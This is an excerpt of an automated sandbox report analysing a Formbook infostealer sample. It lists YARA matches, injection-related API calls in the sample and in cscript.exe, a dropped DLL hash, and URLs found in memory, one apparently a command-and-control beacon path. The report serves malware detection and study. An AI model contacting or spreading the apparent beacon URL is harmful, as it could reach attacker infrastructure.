          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cscript.exe, 00000003.00000002.605431320.00000000050D2000.00000004.00000001.sdmpString found in binary or memory: https://www.yakudatsu-hikaku.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.4oItdZkNOZ.exe.26a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.4oItdZkNOZ.exe.26a0000.2.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.4oItdZkNOZ.exe.26a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.4oItdZkNOZ.exe.26a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.4oItdZkNOZ.exe.26a0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.4oItdZkNOZ.exe.26a0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_004182EA NtClose,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_0041839A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B798F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B795D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B797A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B798A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B7B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B799D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79A10 NtQuerySection,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B7A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B795F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B7AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79560 NtWriteFile,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B796D0 NtCreateKey,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B7A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B7A770 NtOpenThread,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B79760 NtOpenProcess,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_1_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_1_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_1_004182F0 NtClose,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A895D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A896E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A896D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A899A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A895F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A8AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A897A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A8A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A8A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A898A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A898F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A8B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A899D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A8A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A89B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B682F0 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B68270 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B683A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B681C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B682EA NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B6839A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_004046A7
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_0040102C
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_0041B881
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_0041C10F
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_0041A2A6
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_0041BC41
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00408C5C
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00408C60
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_0041CEF6
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B620A0
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4B090
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C028EC
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C020A8
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1002
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C0E824
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B54120
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3F900
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C022AE
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BEFA2B
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6EBB0
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF03DA
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BFDBD2
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C02B28
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5AB40
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4841F
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BFD466
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C025DD
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B62581
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4D5E0
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B30D20
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C01D55
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C02D07
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C02EF7
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B56E30
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BFD616
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C0DFCE
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C01FF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A5841F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B0D466
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A72581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A5D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B125DD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A40D20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B12D07
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B11D55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B12EF7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A66E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B0D616
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B11FF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B1DFCE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A720A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B120A8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A5B090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B128EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B1E824
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B01002
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A64120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A4F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B122AE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AFFA2B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7EBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B0DBD2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B003DA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B12B28
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A6AB40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B6A2A6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B6CEF6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B52FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B58C60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B58C5C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B52D90
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsv773C.tmp\m9c3uhgbfqo.dll 29943F203F544CD1F2B51396E1B371B017B705A3D43FF16E3A8FCC7350E629D9
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: String function: 00B3B150 appears 45 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04A4B150 appears 48 times
          Source: 4oItdZkNOZ.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 4oItdZkNOZ.exe, 00000000.00000003.341791860.000000001EF56000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 4oItdZkNOZ.exe
          Source: 4oItdZkNOZ.exe, 00000001.00000002.388375674.0000000000C2F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 4oItdZkNOZ.exe
          Source: 4oItdZkNOZ.exe, 00000001.00000002.388207380.0000000000A60000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs 4oItdZkNOZ.exe
          Source: 4oItdZkNOZ.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
